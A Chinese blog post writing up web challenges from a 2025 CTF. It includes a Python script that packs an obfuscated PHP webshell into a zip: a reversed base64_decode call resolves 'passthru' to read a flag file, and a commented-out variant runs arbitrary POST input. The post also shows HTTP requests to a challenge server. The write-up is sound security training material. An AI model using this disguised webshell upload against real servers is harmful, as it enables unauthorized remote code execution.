When camellia shattered...

第八届封神台CTF-2025 web

OneZ3r0 Lv3

2025-04-21 17:10:36 2025-04-21 17:10:36 创建 2025-07-29 18:03:58 2025-07-29 18:03:58 更新

wp

webTools

原题，zip软链接

https://github.com/utisss/UTCTF-24/blob/main/web-schrodinger/Schrodinger%20Writeup.md

图床

SUCTF的原题改编 https://github.com/team-su/SUCTF-2025/tree/master/web/SU_photogallery/writeup

php development server 泄露 https://projectdiscovery.io/blog/php-http-server-source-disclosure

GET /unzip.php HTTP/1.1
Host: 159.138.63.173:8085


GET /one.z3r0 HTTP/1.1

哦，这人还会改编，先phpinfo()看到disable_function加了挺多
passthru没被禁用可以使用，尝试了下写马，但是貌似无法返回回来，所以直接执行命令一步一步看了

import zipfile
import io
 
# 创建一个 BytesIO 对象来存储压缩文件内容
mf = io.BytesIO()

# payload = b'''<?php
# $a = 'edoced_46esab';
# $b = strrev($a);

# $d = 'c3~@#@#@lz!@dGVt';
# $s = $b($d);

# echo $sys;
# $s($_POST[1]);
# ?>'''

payload = b'''<?php
$a = 'edoced_46esab';
$b = strrev($a);
$d = 'cGFzc3RocnU=';
$s = $b($d);

$s("cat /fl?g_9785");
?>'''
# 使用 zipfile 创建一个 ZIP 文件
with zipfile.ZipFile(mf, mode="w", compression=zipfile.ZIP_STORED) as zf:
    # 向 ZIP 文件中写入恶意 PHP 文件
    zf.writestr('exp.php', payload)
    # 向 ZIP 文件中写入一个文件名为 'A' * 5000 的文件，内容为 'AAAAA'
    zf.writestr('A' * 5000, b'AAAAA')
 
# 将生成的 ZIP 文件写入磁盘
with open("shell.zip", "wb") as f:
    f.write(mf.getvalue())

标题: 第八届封神台CTF-2025 web
作者: OneZ3r0
创建于 : 2025-04-21 17:10:36
更新于 : 2025-07-29 18:03:58
链接: https://blog.onez3r0.top/2025/04/21/zkaqctf-2025/
版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。

目录

第八届封神台CTF-2025 web

webTools
图床